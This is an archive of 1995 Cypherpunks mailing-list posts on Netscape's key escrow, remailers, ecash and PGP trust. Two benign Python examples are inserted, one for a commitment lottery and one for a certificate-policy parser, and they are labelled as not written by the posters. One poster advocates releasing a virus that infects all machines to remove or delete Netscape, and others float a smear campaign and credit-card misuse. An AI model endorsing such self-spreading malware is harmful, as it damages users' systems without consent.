On Thu, 30 Nov 1995, Anonymous wrote:

>       Aleph One's suggestion -- an NS-hack or "virus" -- doesn't make any
> sense: if Perry or someone would vet a hacked copy, I'd use it in a
> second. But hacking it would involve a violation of the license, so hacked
> versions couldn't be offered in any above-ground way: there'd be no way to
> certify a hacked copy with a trusted nym's key.

	You seem to have missed the point. A "virus" is not there to fix
your copy because you want it. It's there because I want it. It would
be released so that it infects all possible machines. It would either
remove the routines in Netscape that allow escrow or simply remove the
offensive copy of Netscape (can't use it if it's not there 8)
Violation of the license? Really? Like virus writers give a damn.

>       Netscape is between a rock and a hard place: I think it's safe to
> say that, were all things equal, NS would support strong crypto. The fact
> that NS has decided otherwise suggests that some pressure was applied:
> Clark says as much. This leads me to believe that one possibly effective
> (and possibly dangerous) tactic might lie in a seriously sustained attack
> on NS's reputation -- keeping up a meme-drumbeat of "you can't trust
> Netscape, that's all, you'll get ripped off." I think we should try it --
> TODAY, now, persistently and loudly, until NS comes around. I'm not saying
> that this'll be enough, but it's a start. TODAY. And I really don't care
> what it takes: calling cronies in the press, spreading innuendo, redoing
> NS icon sets so there's a spy from "Spy Versus Spy" loitering behind the
> N... I've seen some nice "NO Netscape" tags on GNU-related pages. Let's do
> it.

	Yes and you must remember the power of the net. As an example remember
the heat Microsoft took for the Registration Wizard, when all it does is
ASK YOU if you would like to submit the recorded information about your
computer to Microsoft. It was so blown out of proportion that it even made
it to places that would check this kind of stuff, like Information Week.

> 
> Hieronymous
> FB DD B5 C8 FB F4 52 41  F0 0F A0 6E 99 43 75 06
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
> 
> iQBVAwUBML1vc73g0mNE55u1AQGfdgIAsldR3e9UQZG9//38B9LrU/HnCSzaY1kB
> RMOcBdab5EZ2X9BXkA7lIdDJUUqHOykuv1oyFDtitWRsXxmaTb0cuw==
> =0FmD
> -----END PGP SIGNATURE-----
> 

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: amp <Alan.Pugh@internetMCI.COM>
Date: Wed, 29 Nov 1995 22:30:17 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: Diskless "Eunuchs" Machines Likely to Fail
Message-ID: <01HY7L2XIX3M922UYS@MAIL-CLUSTER.PCY.MCI.NET>
MIME-Version: 1.0
Content-Type: text/plain


-- [ From: amp * EMC.Ver #2.3 ] --

-----BEGIN PGP SIGNED MESSAGE-----

From: Timothy C. May           \ Internet:    (tcmay@got.net)

TM> I'm skeptical of the "Diskless Internet Box = Telephone" analogy.

TM> Folks I know who are not computer-savvy, or who have other things
TM> they'd rather be doing, are not likely, as I see it, to buy boxes
TM> that still require them to type messages to other people but that
TM> don't allow them to download and save the interesting stuff they
TM> find.

TM> The telephone appealed to those who truly wanted to "just keep
TM> talking"...that was the beauty of it. Most people don't know how to
TM> touch-type, and typing by hunting-and-pecking is painful and unnatural
TM> for most people.

i guess it kinda depends upon the epoch in which you grow up. when
telephones were first introduced, it didn't seem as natural to people
as it does for us today. i've got a copy of the encyclopedia
britannica published in 1903 that has some _fascinating_ stuff on
telecommunications. (i'm in the process of scanning it in. anyone who
is interested in it can email me and i'll send it to you when i'm
done. 1903=no copyright) 

i've seen people's typing skills improve remarkably just through
sheer repetition. i think that hunt-and-peck falls to look-and-peck
if you find yourself typing to any serious degree rather quickly.


TM> A couple of years ago "the computer for the rest of us" was said to be
TM> a pen-based Newton-type machine, now it is said to be a diskless,
TM> memory-limited "Eunuchs" machine.

unless memory becomes _real cheap_ real fast, diskless workstations
won't do. i don't see why it would be so hard for those pushing these
machines to add enough disk to make it usable and still stay cheap. 

otoh, i don't think the internet is enough of a pull for people to
want machines like this even if they did have local storage. i figure
most people want computers to do something more for them than send
e-mail. hell, i can send e-mail with a modem and dumb terminal. (been
there-done that). i think the thing that will kill this idea will be
the simple fact that people expect a computer to do more than what
those pushing this 'technology' think they do.


TM> I see a greater chance that home game machines, such as the 3DO and Sony
TM> PlayStation machines will get Web browsers done for them than I do that
TM> people will buy machines that are so limited.

good call. i think people will soon be expecting more out of those
game machines than they currently do. i know i sure as hell would
given the price. why can't current game machines support
telecommunications? the modem i'm using to send this message is
running on a dsp chip. i remember playing falcon-at via modem several
years ago. it was a hoot even at the bauds available then. at 14.4 or
better it would be a real hoot.

TM> The only relevance of this whole topic to Cypherpunks
TM> is....is....minimal.

same here. however, what is happening in the computer business does
have _some_ relevance to crypto as we have to see where the market is
heading. 


amp
<0003701548@mcimail.com> (since 10/31/88)
<alan.pugh@internetmci.com>
PGP Key = 57957C9D
PGP FP = FA 02 84 7D 82 57 78 E4  E2 1C 7B 88 62 A6 F9 F7 
November 29, 1995   18:18
 

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: amp <Alan.Pugh@internetMCI.COM>
Date: Wed, 29 Nov 1995 22:30:19 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: The future will be easy to use
Message-ID: <01HY7L3OU4XE922UYW@MAIL-CLUSTER.PCY.MCI.NET>
MIME-Version: 1.0
Content-Type: text/plain


-- [ From: amp * EMC.Ver #2.3 ] --

-----BEGIN PGP SIGNED MESSAGE-----

From: Jack P. Starrantino      \ Internet:    (jps@monad.semcor.com)

JS> I bring nothing cypher-wise. I would be willing to help walk the
JS> s/w-engineering dog and to write Motif/X/socket if the chosen platform
JS> is UN*X, however.

JS> So, from an engineering standpoint, what should the "future" look
JS> like?

unfortunately, it appears to me that if you _really_ want encryption
to be universal, it's gotta be done on windoze, it's gotta be
point-n-click and seamless to the mail application. i would prefer it
if the masses would use a real operating system, (no o/s wars please.
i started in a mini/mainframe environment and simply don't think
dos/windoze qualify. your mileage may vary), but that just ain't the
way it is. would netscape be selling at $130+ if they only wrote for
unix?

my 2 cents


amp
<0003701548@mcimail.com> (since 10/31/88)
<alan.pugh@internetmci.com>
PGP Key = 57957C9D
PGP FP = FA 02 84 7D 82 57 78 E4  E2 1C 7B 88 62 A6 F9 F7 
November 29, 1995   17:40
 

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Thu, 30 Nov 1995 22:41:40 +0800
To: cypherpunks@toad.com
Subject: Re: ecash lottery (Was: ecash casino)
Message-ID: <v02120d45ace367e370bd@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:27 AM 11/30/95, Timothy C. May wrote:
<snip>
>My intuition (hand-waving) is that an anonymous lottery is possible, but I
>haven't looked at the details. Certainly multiple trusted holders of keys
>(escrow agents) would help make the lottery fair. Maybe bit commitment
>would help (each player buys the right to play, then "commits" his number.
>A public reading of the winning number occurs, and the winner can reveal
>his winning number (anonymously if he wishes, providing he had registered
>his hash....).

My bet it would work a lot like anonymous voting schemes would, though I
don't know how. It just feels like the same kind of thing...

Cheers,
Bob

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<
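
The bit-commitment idea quoted in the message above, worked through as an added example (not code from either poster). The Lottery class, the 16-byte nonce and the sample numbers are assumptions made for illustration; the draw itself is passed in as a stand-in for the "public reading".

```python
import hashlib
import secrets

NONCE_LEN = 16  # random bytes that blind the committed number (assumed size)


def commit(number: int, nonce: bytes) -> str:
    """Return SHA-256(nonce || number) as hex: the 'registered hash'."""
    if len(nonce) != NONCE_LEN:
        raise ValueError("nonce must be %d bytes" % NONCE_LEN)
    if not 0 <= number < 2 ** 32:
        raise ValueError("number out of range")
    # Fixed-width encoding keeps the nonce||number concatenation unambiguous.
    return hashlib.sha256(nonce + number.to_bytes(4, "big")).hexdigest()


def guess_unblinded(commitment: str, number_range: int):
    """Show why the nonce matters: a bare hash of a small number is searchable.

    Returns the number if the commitment is SHA-256(number) with no nonce,
    otherwise None.
    """
    for candidate in range(number_range):
        digest = hashlib.sha256(candidate.to_bytes(4, "big")).hexdigest()
        if digest == commitment:
            return candidate
    return None


class Lottery:
    """Public bulletin board of commitments plus a single draw."""

    def __init__(self, number_range: int):
        self.number_range = number_range
        self.board = set()      # registered commitments, visible to everyone
        self.winning = None     # set once by draw()

    def register(self, commitment: str) -> None:
        # Commitments are only accepted before the winning number is known.
        if self.winning is not None:
            raise RuntimeError("registration closed: the draw has happened")
        if commitment in self.board:
            raise ValueError("commitment already registered")
        self.board.add(commitment)

    def draw(self, winning_number: int) -> None:
        if self.winning is not None:
            raise RuntimeError("draw already held")
        if not 0 <= winning_number < self.number_range:
            raise ValueError("winning number out of range")
        self.winning = winning_number

    def verify_claim(self, number: int, nonce: bytes) -> bool:
        """Anyone can check a claim; it names no identity, only an opening."""
        if self.winning is None or number != self.winning:
            return False
        return commit(number, nonce) in self.board


def demo() -> dict:
    lottery = Lottery(1000)
    alice_nonce = secrets.token_bytes(NONCE_LEN)
    bob_nonce = secrets.token_bytes(NONCE_LEN)
    lottery.register(commit(417, alice_nonce))   # constructed sample picks
    lottery.register(commit(23, bob_nonce))
    lottery.draw(417)
    return {
        "winner_opens": lottery.verify_claim(417, alice_nonce),
        "loser_opens": lottery.verify_claim(23, bob_nonce),
        "wrong_nonce": lottery.verify_claim(417, secrets.token_bytes(NONCE_LEN)),
    }


if __name__ == "__main__":
    print(demo())
```
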






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Thu, 30 Nov 1995 22:40:49 +0800
To: cypherpunks@toad.com
Subject: Credit card theft Re: The future will be easy to use
In-Reply-To: <96oDFD11w165w@bwalk.dm.com>
Message-ID: <Pine.3.89.9511300805.B35014-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Thu, 30 Nov 1995, Dr. Dimitri Vulis wrote:

> futplex@pseudonym.com (Futplex) writes:
> > People who steal credit cards prefer to order goods to be delivered somewhere
> > they can grab them.
> 
> For most goods, yes. But one could use a stolen credit card, e.g., to set
> up an account on AOL / CompuServe and download tons of software, charging
> it to the card.
> 

<Flamebait>
Or c2.org, which might then make things interesting if the theft is detected.
(in a very perverse, and tooth-gnashingly aggravating way, of course).
Would Sameer cooperate with the LEAs to catch "an anonymous suspect using
his service"? 

What if it's an ecash password getting stolen? Who's liable? (lemme 
guess, your money's gone, tough luck!) What if you're just a dumb 
gullible computer newbie who trusts ecash for its vaunted security? 
"But how was I supposed to know that if I let someone surf my 
shoulder, I'd lose my bank account!?" I'd say buyer beware! but he'd 
sue and the public will want a law ("Damn it, consumers have to be 
PROTECTED!").
Credit only has $50 worth of risk, most people are more interested in 
keeping their $ than their privacy. Just look at the number of them who 
enter contests.
</Flamebait>

Disclaimer: I don't have a marktwain account at the moment, so I can't
say a thing about the security of the system. I wish them the absolute best of 
luck.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Fri, 1 Dec 1995 02:12:57 +0800
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199511301739.JAA13160@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 21 Nov 1995, Raph Levien wrote:

> Groups of remailers sharing a machine or operator:
> (robo syrinx c2)
> (flame hacktic replay)
> (alumni portal)

Anything more specific on the above info? 

  robo, syrinx, c2 all running on c2.org
  alumni, portal run by Hal Finney
  hacktic, replay run on xs4all / by Alex de Joode?

ok so far, but flame is xs4all/de Joode as well?

flame used to be:

  Slovenian Anonymous Remailer <remailer@flame.sinet.org>

Does the fact that it is now listed along with hacktic and replay now
imply that it is no longer / never was in Slovenia?

The reason for asking is that jurisdictions are interesting properties
for remailers.  The more jurisdictions available the better the legal
morass can be created by remailing through 101 different jurisdictions.

Speaking of which, these new additions:

  ford <remailer@bi-node.zerberus.de>
  ecafe <cpunk@remail.ecafe.org>

are welcome additions both being in Europe (Germany, and UK respectively)

Any other European/Australasian cypherpunks care to add a remailer in
their jurisdiction?

Alice de 'nonymous ...

[just giving the acquired nym a work out, and I wanted to ask the Q
anyway, so I thought I may as well flesh this Nym out, and give it a
better rep than the impostor who refuses to sign posts :-) Again,
anything that isn't signed isn't from me.]

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ahupp@primenet.com (Adam Hupp)
Date: Fri, 1 Dec 1995 15:32:58 +0800
To: Jon Lasser <jlasser@rwd.goucher.edu>
Subject: Re: key for Alice as promised (not)
Message-ID: <199512010334.UAA07818@usr2.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


>On Tue, 28 Nov 1995, Adam Hupp wrote:
>
>> >Can you imagine??  I'm simply not willing to fool myself into thinking 
>> >that I have security by posting a key and using PGP.
>> 
>> Unless you can post some proof that PGP is insecure, stop insisting it is.
>
>Hold on a minute.  Alice is, here, 100% correct.
>
>If I use PGP to read messages and there's a videocamera trained on the 
>keyboard, and other people have access to the machine, PGP is not 
>secure.  Similarly, if PGP is on a computer which other people may use 
>without my supervision, they can  monitor keystrokes, etc. and PGP is not 
>secure.
>
>A chain is only as strong as its weakest link; Alice recognizes this, and 
>makes no claim that PGP itself is the weak link.  The weak link is the 
>physical security of the system which Alice claims to use.
>
>Jon
>------------------------------------------------------------------------------
>Jon Lasser                <jlasser@rwd.goucher.edu>            (410)494-3072 
>          Visit my home page at http://www.goucher.edu/~jlasser/
>  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.
>
>

I guess I missed Alice's point, but I gave it more thought and Alice is
still wrong:

1) If someone DID monitor Alice, that almost definitely means the remailer
chain was compromised. The weakest link here is the remailer chain, not
Alice's computer's physical security.*  If Alice's true address is not
known, there cannot be any monitoring of his/her computer (unless it is for
some other reason than "Alice").

2) This whole deal is about Alice signing his/her messages, not encrypting
them.  What Alice would be giving up if his/her computer were compromised
would not be security, but identity. The most Alice could lose, IF the
remailer chain were compromised and IF his/her computer's physical security
were compromised is his/her reputation by spoofing (loss of
pseudo-anonymity is a given if the attacker gets that far).  Those are
some really big Ifs.

*BTW, the chain is NOT as strong as its weakest link.  If I send mail to a
remailer, and it strips the headers like it's supposed to, but sends the
mail to a compromised remailer (the weak link), I am just as secure as before. 

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6

mQBtAzCNppQAAAEDALhWZl7IuGZ9zZT5bACo0b/1L0Nv0C72vKHIO3IHh+cwpHHa
2Ozb9aeO0UvXGwkkZIYgUm0EvmzKh7yb1GTLvBp5kXpR3I9w+Yj4LGlBDERpUWw6
x4ED49pwDnz1Hl5FBQAFEbQYYXNoIDxhaHVwcEBwcmltZW5ldC5jb20+
=PtJK
-----END PGP PUBLIC KEY BLOCK-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 30 Nov 1995 17:11:04 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape gives in to key escrow
Message-ID: <199511300849.JAA13845@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 11/30/95 3:07 AM, Futplex quoted:

>> http://www.cnet.com/Central/News/govt.html
 ...
>---------------------------------------------
 ...
> said Clark. He added that an invincible security system for the Net is 
> possible, but such a system won't be built unless the government has a stake 
> in it. "That's where key escrow comes in," said Clark. 
>---------------------------------------------

      "A stake in its heart," more like.

Futplex then wrote:

 ...
>Netscape's web pages. I hope they will at least have the courage to put out a
>"We Support Clipper II" press release. Now the question is, how much of a
>role does Netscape Communications intend to play in implementing GAK, and
>what can we do to counter it ?

      Well, spamming the sign won't do.

      Aleph One's suggestion -- an NS-hack or "virus" -- doesn't make any
sense: if Perry or someone would vet a hacked copy, I'd use it in a
second. But hacking it would involve a violation of the license, so hacked
versions couldn't be offered in any above-ground way: there'd be no way to
certify a hacked copy with a trusted nym's key.
      Netscape is between a rock and a hard place: I think it's safe to
say that, were all things equal, NS would support strong crypto. The fact
that NS has decided otherwise suggests that some pressure was applied:
Clark says as much. This leads me to believe that one possibly effective
(and possibly dangerous) tactic might lie in a seriously sustained attack
on NS's reputation -- keeping up a meme-drumbeat of "you can't trust
Netscape, that's all, you'll get ripped off." I think we should try it --
TODAY, now, persistently and loudly, until NS comes around. I'm not saying
that this'll be enough, but it's a start. TODAY. And I really don't care
what it takes: calling cronies in the press, spreading innuendo, redoing
NS icon sets so there's a spy from "Spy Versus Spy" loitering behind the
N... I've seen some nice "NO Netscape" tags on GNU-related pages. Let's do
it.


Hieronymous
FB DD B5 C8 FB F4 52 41  F0 0F A0 6E 99 43 75 06
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBML1vc73g0mNE55u1AQGfdgIAsldR3e9UQZG9//38B9LrU/HnCSzaY1kB
RMOcBdab5EZ2X9BXkA7lIdDJUUqHOykuv1oyFDtitWRsXxmaTb0cuw==
=0FmD
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 30 Nov 1995 17:20:40 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape gives in to key escrow
Message-ID: <199511300850.JAA13876@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 11/30/95 3:07 AM, Futplex quoted:

>> http://www.cnet.com/Central/News/govt.html
 ...
>---------------------------------------------
 ...
> said Clark. He added that an invincible security system for the Net is 
> possible, but such a system won't be built unless the government has a stake 
> in it. "That's where key escrow comes in," said Clark. 
>---------------------------------------------

      "A stake in its heart," more like.

Futplex then wrote:

 ...
>Netscape's web pages. I hope they will at least have the courage to put out a
>"We Support Clipper II" press release. Now the question is, how much of a
>role does Netscape Communications intend to play in implementing GAK, and
>what can we do to counter it ?

      Well, spamming the sign won't do.

      Aleph One's suggestion -- an NS-hack or "virus" -- doesn't make any
sense: if Perry or someone would vet a hacked copy, I'd use it in a
second. But hacking it would involve a violation of the license, so hacked
versions couldn't be offered in any above-ground way: there'd be no way to
certify a hacked copy with a trusted nym's key.
      Netscape is between a rock and a hard place: I think it's safe to
say that, were all things equal, NS would support strong crypto. The fact
that NS has decided otherwise suggests that some pressure was applied:
Clark says as much. This leads me to believe that one possibly effective
(and possibly dangerous) tactic might lie in a seriously sustained attack
on NS's reputation -- keeping up a meme-drumbeat of "you can't trust
Netscape, that's all, you'll get ripped off." I think we should try it --
TODAY, now, persistently and loudly, until NS comes around. I'm not saying
that this'll be enough, but it's a start. TODAY. And I really don't care
what it takes: calling cronies in the press, spreading innuendo, redoing
NS icon sets so there's a spy from "Spy Versus Spy" loitering behind the
N... I've seen some nice "NO Netscape" tags on GNU-related pages. Let's do
it.


Hieronymous
FB DD B5 C8 FB F4 52 41  F0 0F A0 6E 99 43 75 06
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBML1vc73g0mNE55u1AQGfdgIAsldR3e9UQZG9//38B9LrU/HnCSzaY1kB
RMOcBdab5EZ2X9BXkA7lIdDJUUqHOykuv1oyFDtitWRsXxmaTb0cuw==
=0FmD
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Fletcher <fletch@ain.bls.com>
Date: Thu, 30 Nov 1995 23:28:42 +0800
To: Patiwat Panurach <pati@ipied.tu.ac.th>
Subject: Re: VisaCash security.
In-Reply-To: <Pine.SUN.3.91.951130113539.3024C-100000@ipied.tu.ac.th>
Message-ID: <9511301505.AA04420@outland>
MIME-Version: 1.0
Content-Type: text/plain



	I think the Visa stuff is basically stored value and 
rechargeable smart cards, not really ecash type money.  Supposedly
you'll be able to get a card with $10 or $20 on it and all the
vending machines and phones around the Olympic venues will be set
up to take the cards.  So to answer your questions, no it's not really
digital cash (like ecash); and yes I think it's probably traceable
to some extent (unless you buy stored value cards w/paper cash).

	First Union, the bank selling the cards, has a page on them:

http://www.firstunion.com/visacash/

	Low on the technical info, but they give an address to mail
questions to.

---
Fletch                                                     __`'/|
fletch@ain.bls.com  "Lisa, in this house we obey the       \ o.O'    ______
404 713-0414(w)	     Laws of Thermodynamics!" H. Simpson   =(___)= -| Ack. |
404 315-7264(h) PGP Print: 8D8736A8FC59B2E6 8E675B341E378E43  U      ------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Thu, 30 Nov 1995 23:55:30 +0800
To: rsalz@osf.org
Subject: Re: The future will be easy to use
In-Reply-To: <199511292049.MAA01411@comsec.com>
Message-ID: <9511301511.AA27694@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>From: Rich Salz <rsalz@osf.org>
>Date: Wed, 29 Nov 1995 08:54:33 -0500



>Bingo!  This is one of the hard parts of certificate authorities; just
>what are you attesting to?  The American Bar Association has a big document
>for public review that addresses what this might mean; there are a couple
>of RFC's that specify CA policies (one from COST in Sweden, I think), and
>RSA and/or Verisign will give you their policy in hardcopy.
>
>In x.509v3 certificates, there is an extensible field where the key-signer
>can put arbitrary data.  The intent is apparently that you put the ISO
>object-ID (you know, those funny 1.3.2.11.... numbers) of the policy
>document.

Ah, yes.  Here's another example of the problem with ASN.1.  That field
could equivalently be just a URL for the policy document (or, if short
enough, the policy itself).  However, ASN.1 seduced folks into indirecting
this through some object ID -- bringing all these documents into the one
master hierarchy of things in the world.

Some people just like hierarchies, I guess. :)

>There is, of course, no way to interpret the semantics of this electronically.

Of course not.  In the end, a human needs to make the decision based on
ASCII text.

>It will be interesting to see how various companies address this issue,
>for example as they start to support arbitrary CA's in browsers or servers
>while doing commerce over the web.

Yup.

 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison      cme@tis.com    http://www.clark.net/pub/cme	   |
|Trusted Information Systems, Inc.   http://www.tis.com/                   |
|3060 Washington Road          PGP 2.6.2:  61E2DE7FCB9D7984E9C8048BA63221A2|
|Glenwood MD  21738         Tel:(301)854-6889      FAX:(301)854-5363       |
+--------------------------------------------------------------------------+

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----
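
The two options discussed in the message above (a policy object-ID, or simply a URL to the policy text) both exist in the certificatePolicies extension as the later PKIX profile (RFC 5280) defines it. The following is an added example, not code from either poster: a minimal DER reader for that extension value, run on a constructed sample whose policy OID sits under the documentation-only enterprise arc 1.3.6.1.4.1.32473 and whose URL is a placeholder.

```python
ID_QT_CPS = "1.3.6.1.5.5.7.2.1"  # qualifier type: URI pointing at the policy text
TAG_OID, TAG_IA5, TAG_SEQ = 0x06, 0x16, 0x30


def tlv(tag: int, content: bytes) -> bytes:
    """Encode one DER tag-length-value with a definite length."""
    n = len(content)
    if n < 0x80:
        length = bytes([n])
    else:
        raw = n.to_bytes((n.bit_length() + 7) // 8, "big")
        length = bytes([0x80 | len(raw)]) + raw
    return bytes([tag]) + length + content


def read_tlv(data: bytes, pos: int):
    """Return (tag, content, next_pos); reject truncated or indefinite lengths."""
    if pos + 2 > len(data):
        raise ValueError("truncated header")
    tag, first = data[pos], data[pos + 1]
    pos += 2
    if first < 0x80:
        length = first
    else:
        k = first & 0x7F
        if k == 0 or k > 4 or pos + k > len(data):
            raise ValueError("unsupported length encoding")
        length = int.from_bytes(data[pos:pos + k], "big")
        pos += k
    if pos + length > len(data):
        raise ValueError("truncated content")
    return tag, data[pos:pos + length], pos + length


def encode_oid(dotted: str) -> bytes:
    arcs = [int(a) for a in dotted.split(".")]
    if len(arcs) < 2 or arcs[0] > 2 or (arcs[0] < 2 and arcs[1] > 39):
        raise ValueError("invalid OID")
    body = bytearray()
    # The first two arcs share one value; every value is base-128, high bit = "more".
    for value in [arcs[0] * 40 + arcs[1]] + arcs[2:]:
        groups = [value & 0x7F]
        value >>= 7
        while value:
            groups.append(0x80 | (value & 0x7F))
            value >>= 7
        body.extend(reversed(groups))
    return tlv(TAG_OID, bytes(body))


def decode_oid(content: bytes) -> str:
    if not content or content[-1] & 0x80:
        raise ValueError("malformed OID")
    arcs, value = [], 0
    for byte in content:
        value = (value << 7) | (byte & 0x7F)
        if not byte & 0x80:
            arcs.append(value)
            value = 0
    first = min(arcs[0] // 40, 2)
    return ".".join(str(a) for a in [first, arcs[0] - 40 * first] + arcs[1:])


def policy_information(policy_oid: str, cps_uri=None) -> bytes:
    """Build one PolicyInformation, optionally with a CPS-pointer qualifier."""
    body = encode_oid(policy_oid)
    if cps_uri is not None:
        qualifier = tlv(TAG_SEQ, encode_oid(ID_QT_CPS)
                        + tlv(TAG_IA5, cps_uri.encode("ascii")))
        body += tlv(TAG_SEQ, qualifier)
    return tlv(TAG_SEQ, body)


def parse_certificate_policies(ext_value: bytes):
    """Return [(policy_oid, [cps_uri, ...]), ...] from the extension value."""
    tag, policies, end = read_tlv(ext_value, 0)
    if tag != TAG_SEQ or end != len(ext_value):
        raise ValueError("expected one SEQUENCE with no trailing bytes")
    result, pos = [], 0
    while pos < len(policies):
        tag, info, pos = read_tlv(policies, pos)
        if tag != TAG_SEQ:
            raise ValueError("PolicyInformation must be a SEQUENCE")
        tag, oid, after_oid = read_tlv(info, 0)
        if tag != TAG_OID:
            raise ValueError("policyIdentifier must be an OID")
        uris = []
        if after_oid < len(info):
            tag, qualifiers, _ = read_tlv(info, after_oid)
            if tag != TAG_SEQ:
                raise ValueError("policyQualifiers must be a SEQUENCE")
            qpos = 0
            while qpos < len(qualifiers):
                _, qualifier, qpos = read_tlv(qualifiers, qpos)
                qtag, qid, after_qid = read_tlv(qualifier, 0)
                vtag, value, _ = read_tlv(qualifier, after_qid)
                if qtag == TAG_OID and decode_oid(qid) == ID_QT_CPS and vtag == TAG_IA5:
                    uris.append(value.decode("ascii"))
        result.append((decode_oid(oid), uris))
    return result


# Constructed sample: one policy with a URL qualifier, one bare anyPolicy OID.
SAMPLE_EXTENSION = tlv(
    TAG_SEQ,
    policy_information("1.3.6.1.4.1.32473.1.1", "https://ca.example/cps.txt")
    + policy_information("2.5.29.32.0"),
)
```

The parser hands back only identifiers and a URL; deciding whether the policy behind them is acceptable is still left to a person reading the text, which is the point both posters make.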




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 30 Nov 1995 23:43:58 +0800
To: Pete Loshin <pete@loshin.com>
Subject: Re: "Proprietary" internetworking protocols (was RE: The future will be easy to use )
In-Reply-To: <01BABEAC.2E90BDC0@ploshin.tiac.net>
Message-ID: <199511301513.KAA05983@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Pete Loshin writes:
> I was simply observing that Perry's comment:
> 
> "...an internetworking protocol [e.g. SKIP] used by only 
> one vendor gets nowhere."
> 
> is not necessarily true, and pointed to SSL and NFS as 
> counter-examples.

I disagree.

First of all, NFS was not competing with other widely available
standards.

Second of all, other vendors are committed to developing the other
standard.

What good will it be to run SKIP when your Cisco router wants to talk
to you with something else?

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 30 Nov 1995 23:53:32 +0800
To: cypherpunks@toad.com
Subject: Re: Your faith is PGP is charming and quaint, but wrong
In-Reply-To: <199511300446.UAA19851@infinity.c2.org>
Message-ID: <199511301515.KAA05995@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Hroller Anonymous Remailer writes:
> 
> All of these articles from people claiming to be me!
> 
> I repeat, for the slow learners, that I consider PGP to be
> untrustworthy, at least on my machines. I don't want those Mounties
> to do to me what they did to Mulroney en passant.

How do we know that you are you? We have no evidence.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Coates <opsan@gnn.com>
Date: Fri, 1 Dec 1995 03:21:07 +0800
To: cypherpunks@toad.com"@mail-e1a.gnn.com
Subject: Re: cypherpunks at ietf
Message-ID: <199511301820.NAA06599@mail-e1a.gnn.com>
MIME-Version: 1.0
Content-Type: text/plain


>> OUR CURRENT PROBLEM IS THAT THE AVERAGE CONSUMER CAN NOT COMPLETE AN ACCURATE
>> SEARCH ON THE WEB.
>>
>> [...]
>>
>> AT THIS POINT SO MANY CYBERPUNKS HAVE EMBEDDED SO MUCH GARBAGE ON THE WEB,
>> THAT YOU CAN NOT COMPLETE AN ACCURATE SEARCH.
>
>Gee:  Someone who has not learnt to use the caps key on his computer
>cannot do accurate searches, so will everyone else please get off
>the net.
>
>>
>> [...]
>>
>> BUT MORE IMPORTANT, WE NEED TO CLEANUP THE TRASH THAT THE CYBER-PUNKS ARE
>> PLACING ON THE WEB.
>
>Pleasant comic relief.
>

My guess is he simply wanted to embarrass himself.  Don't they have karaoke 
bars for that sort of thing?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Fri, 1 Dec 1995 00:09:03 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape gives in to key escrow
In-Reply-To: <199511300807.DAA12251@opine.cs.umass.edu>
